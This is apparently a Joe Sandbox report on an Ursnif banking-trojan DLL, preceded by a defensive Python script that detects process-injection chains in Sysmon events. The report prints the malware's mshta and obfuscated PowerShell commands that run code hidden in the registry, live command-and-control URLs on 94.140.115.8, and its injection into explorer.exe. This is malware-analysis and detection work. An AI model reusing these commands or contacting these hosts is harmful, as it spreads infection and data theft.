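GrantedAccess values and the read-only Taskmgr open used as a control case are assumptions.

```python
# Sysmon event 10 GrantedAccess bits that together let a process write code
# into another process and start it; read-only opens (0x1000, 0x1410, ...)
# lack them.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed events mirroring this report. PIDs 4956, 6784, 3616 and the
# start address are the report's; GrantedAccess values and the Taskmgr event
# (PID 1200, read-only access, a benign control case) are assumed.
EVENTS = [
    {"EventID": 10, "SourceProcessId": 4956, "SourceImage": r"C:\Windows\SysWOW64\rundll32.exe",
     "TargetProcessId": 6784, "TargetImage": r"C:\Windows\System32\control.exe",
     "GrantedAccess": 0x1FFFFF},
    {"EventID": 10, "SourceProcessId": 6784, "SourceImage": r"C:\Windows\System32\control.exe",
     "TargetProcessId": 3616, "TargetImage": r"C:\Windows\explorer.exe",
     "GrantedAccess": 0x1FFFFF},
    {"EventID": 8, "SourceProcessId": 6784, "SourceImage": r"C:\Windows\System32\control.exe",
     "TargetProcessId": 3616, "TargetImage": r"C:\Windows\explorer.exe",
     "StartAddress": 0x7FF802BC1580},
    {"EventID": 10, "SourceProcessId": 1200, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetProcessId": 3616, "TargetImage": r"C:\Windows\explorer.exe",
     "GrantedAccess": 0x1410},  # QUERY_INFORMATION | VM_READ | QUERY_LIMITED_INFORMATION
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_injection_access(ev: dict) -> bool:
    """Event 10 whose granted rights can write memory and start a thread."""
    return ev["EventID"] == 10 and (ev["GrantedAccess"] & INJECT_MASK) == INJECT_MASK


def injection_graph(events: list) -> tuple:
    """Directed edges src_pid -> {dst_pid} from injection-grade opens (event 10)
    and remote thread creations (event 8), plus a pid -> image-name map."""
    edges, names = {}, {}
    for ev in events:
        names[ev["SourceProcessId"]] = basename(ev["SourceImage"])
        names[ev["TargetProcessId"]] = basename(ev["TargetImage"])
        if ev["EventID"] == 8 or is_injection_access(ev):
            edges.setdefault(ev["SourceProcessId"], set()).add(ev["TargetProcessId"])
    return edges, names


def injection_chains(events: list) -> list:
    """Every maximal path through the injection graph, as image names.
    A path with more than two nodes is a process used as a stepping stone."""
    edges, names = injection_graph(events)
    targets = {t for ts in edges.values() for t in ts}
    roots = sorted(src for src in edges if src not in targets)
    paths = []

    def walk(pid, path):
        nxt = [t for t in sorted(edges.get(pid, ())) if t not in path]  # no cycles
        if not nxt:
            paths.append([names[p] for p in path])
        for t in nxt:
            walk(t, path + [t])

    for root in roots:
        walk(root, [root])
    return paths


def remote_threads(events: list) -> list:
    """(source, target, start address) for each event 8: the record that ties
    the injector to the code it starts inside the victim."""
    return [(basename(e["SourceImage"]), basename(e["TargetImage"]), e["StartAddress"])
            for e in events if e["EventID"] == 8]


if __name__ == "__main__":
    for chain in injection_chains(EVENTS):
        print(" -> ".join(chain))
    for src, dst, addr in remote_threads(EVENTS):
        print(f"remote thread {src} -> {dst} at {addr:#x}")
```

On the report's data the walk yields rundll32.exe -> control.exe -> explorer.exe, with the one CreateRemoteThread record pointing at 0x7ff802bc1580 in explorer.exe. Sysmon does not log SetThreadContext or NtMapViewOfSection, which is why the first hop here rests on the event 10 access mask alone; the set-thread-context step in the report is only visible to an API monitor.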
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9868.tmp" "c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA96F.tmp" "c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 0000001C.00000000.378233545.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405155586.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.420724914.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001C.00000000.378233545.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405155586.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.378035220.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000001C.00000000.378233545.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405155586.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405237737.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 0000001C.00000000.378233545.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405155586.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.405237737.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059516C6 cpuid 2_2_059516C6
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059481F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,2_2_059481F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05942331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,2_2_05942331
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05931F75 GetVersion,GetModuleHandleA,GetProcAddress,2_2_05931F75
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059400DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_059400DC

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6784, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f894a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4fb6b40.1.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality

                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6784, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f894a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4fb6b40.1.raw.unpack, type: UNPACKEDPE
                      MITRE ATT&CK Matrix (techniques listed per tactic column; the number shown with a technique in the original matrix is kept in parentheses)

                      Initial Access: Valid Accounts (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain
                      Execution: Windows Management Instrumentation (1), Native API (2), Command and Scripting Interpreter (1), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell, Unix Shell
                      Persistence: Valid Accounts (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
                      Privilege Escalation: Valid Accounts (1), Access Token Manipulation (1), Process Injection (813), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
                      Defense Evasion: Obfuscated Files or Information (1), File Deletion (1), Masquerading (1), Valid Accounts (1), Access Token Manipulation (1), Virtualization/Sandbox Evasion (31), Process Injection (813), Rundll32 (1), Masquerading, Invalid Code Signature, Right-to-Left Override, Rename System Utilities
                      Credential Access: Input Capture (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging
                      Discovery: System Time Discovery (1), Account Discovery (1), File and Directory Discovery (3), System Information Discovery (25), Query Registry (1), Security Software Discovery (11), Virtualization/Sandbox Evasion (31), Process Discovery (3), Application Window Discovery (1), System Owner/User Discovery (1), Remote System Discovery (11), System Network Configuration Discovery (1)
                      Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media, Component Object Model and Distributed COM
                      Collection: Archive Collected Data (1), Email Collection (1), Input Capture (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture
                      Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium, Exfiltration over USB
                      Command and Control: Ingress Tool Transfer (1), Encrypted Channel (1), Non-Application Layer Protocol (1), Application Layer Protocol (11), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS
                      Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
                      Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
                      Impact: Modify System Partition, Device Lockout, Delete Device Data, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
                      Behavior Graph (ID: 617384, Sample: 626a983c091a8.tiff.dll, Startdate: 28/04/2022, Architecture: WINDOWS, Score: 100)

                      Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Yara detected Ursnif; 5 other signatures

                      Process relationships recovered from the graph:
                      • loaddll32.exe (started)
                        • cmd.exe
                          • rundll32.exe: connects to 94.140.115.8 (ports 49759, 80; NANO-ASLV, Latvia) and 192.168.2.1 (unknown); signatures: System process connects to network (likely due to code injection or exploit), Writes to foreign memory regions, Allocates memory in foreign processes, 3 other signatures
                            • control.exe: signatures: Changes memory attributes in foreign processes to executable or writable, Injects code into the Windows Explorer (explorer.exe), Writes to foreign memory regions, 4 other signatures
                      • mshta.exe (started)
                        • powershell.exe
                          • explorer.exe (injected): signatures: Self deletion via cmd delete, Disables SPDY (HTTP compression, likely to perform web injects)
                            • cmd.exe: signatures: Uses ping.exe to sleep, Uses ping.exe to check the status of other devices and networks
                              • conhost.exe
                              • PING.EXE
                            • RuntimeBroker.exe (injected)
                          • csc.exe: dropped C:\Users\user\AppData\Local\...\o1ulwvct.dll, PE32
                            • cvtres.exe
                          • csc.exe: dropped C:\Users\user\AppData\Local\...\tn4ral5l.dll, PE32
                            • cvtres.exe
                          • conhost.exe

                      Source | Detection | Scanner | Label
                      626a983c091a8.tiff.dll | 100% | Joe Sandbox ML
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      2.2.rundll32.exe.2ca0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://94.140.115.8/drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://94.140.115.8/drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlk0%Avira URL Cloudsafe
                      http://94.140.115.8/drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      No contacted domains info
                      Name | Malicious | Antivirus Detection | Reputation
                      http://94.140.115.8/drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlktrue
                      • Avira URL Cloud: safe
                      unknown
                      http://94.140.115.8/drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlktrue
                      • Avira URL Cloud: safe
                      unknown
                      http://94.140.115.8/drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlktrue
                      • Avira URL Cloud: safe
                      unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.micropowershell.exe, 00000014.00000003.329756539.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.329437199.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369787923.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      94.140.115.8 | unknown | Latvia | 43513 | NANO-ASLV | true
                      IP
                      192.168.2.1
                      Joe Sandbox Version: 34.0.0 Boulder Opal
                      Analysis ID: 617384
                      Start date and time: 28/04/2022 15:46:16 (2022-04-28 15:46:16 +02:00)
                      Joe Sandbox Product: CloudBasic
                      Overall analysis duration: 0h 11m 3s
                      Hypervisor based Inspection enabled: false
                      Report type: full
                      Sample file name: 626a983c091a8.tiff.dll
                      Cookbook file name: default.jbs
                      Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of new started processes analysed: 38
                      Number of new started drivers analysed: 0
                      Number of existing processes analysed: 0
                      Number of existing drivers analysed: 0
                      Number of injected processes analysed: 2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode: default
                      Analysis stop reason: Timeout
                      Detection: MAL
                      Classification: mal100.bank.troj.evad.winDLL@24/17@0/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information: Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 59
                      • Number of non-executed functions: 191
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6312 because there are no executed functions
                      • Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      Time | Type | Description
                      15:47:26 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
                      15:48:03 | API Interceptor | 39x Sleep call for process: powershell.exe modified
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                      94.140.115.8 | 626a961800203.dll | Get hash | malicious | Browse |
                       | EIo7Dh2fzn.dll | Get hash | malicious | Browse |
                       | 3r0Cgcbr8c.dll | Get hash | malicious | Browse |
                            No context
                             Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                             NANO-ASLV | 626a961800203.dll | Get hash | malicious | Browse | 94.140.115.8
                              | EIo7Dh2fzn.dll | Get hash | malicious | Browse | 94.140.115.8
                              | 3r0Cgcbr8c.dll | Get hash | malicious | Browse | 94.140.115.8
                              | bKhQyaq7WP.exe | Get hash | malicious | Browse | 94.140.115.224
                              | l0zzxRl556.exe | Get hash | malicious | Browse | 94.140.115.224
                              | 6DK0EB55d9.msi | Get hash | malicious | Browse | 94.140.115.44
                              | ProjectsSheet.xls | Get hash | malicious | Browse | 94.140.115.44
                              | ProjectsSheet.xls | Get hash | malicious | Browse | 94.140.115.44
                              | ProjectsSheet.xls | Get hash | malicious | Browse | 94.140.115.44
                              | SecuriteInfo.com.W32.Trojan.TCNN-1225.26439.exe | Get hash | malicious | Browse | 91.203.69.240
                              | SNC-1823171407-Apr-6.xlsb | Get hash | malicious | Browse | 94.140.115.210
                              | SNC-1823171407-Apr-6.xlsb | Get hash | malicious | Browse | 94.140.115.210
                              | 5f1hPXQgBa.exe | Get hash | malicious | Browse | 94.140.114.207
                              | oZdVEauO18.exe | Get hash | malicious | Browse | 94.140.114.229
                              | NFT-291422805-Mar-25.xlsb | Get hash | malicious | Browse | 94.140.114.173
                              | NFT-291422805-Mar-25.xlsb | Get hash | malicious | Browse | 94.140.114.173
                              | Compliance-Report-51318741-Mar-02.xlsb | Get hash | malicious | Browse | 94.140.114.138
                              | Compliance-Report-51318741-Mar-02.xlsb | Get hash | malicious | Browse | 94.140.114.138
                              | 85585722.exe | Get hash | malicious | Browse | 94.140.115.56
                              | 75006628.exe | Get hash | malicious | Browse | 94.140.115.56
                            No context
                            No context
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11606
                            Entropy (8bit):4.8910535897909355
                            Encrypted:false
                            SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                            MD5:F84F6C99316F038F964F3A6DB900038F
                            SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                            SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                            SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                            Malicious:false
                            Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
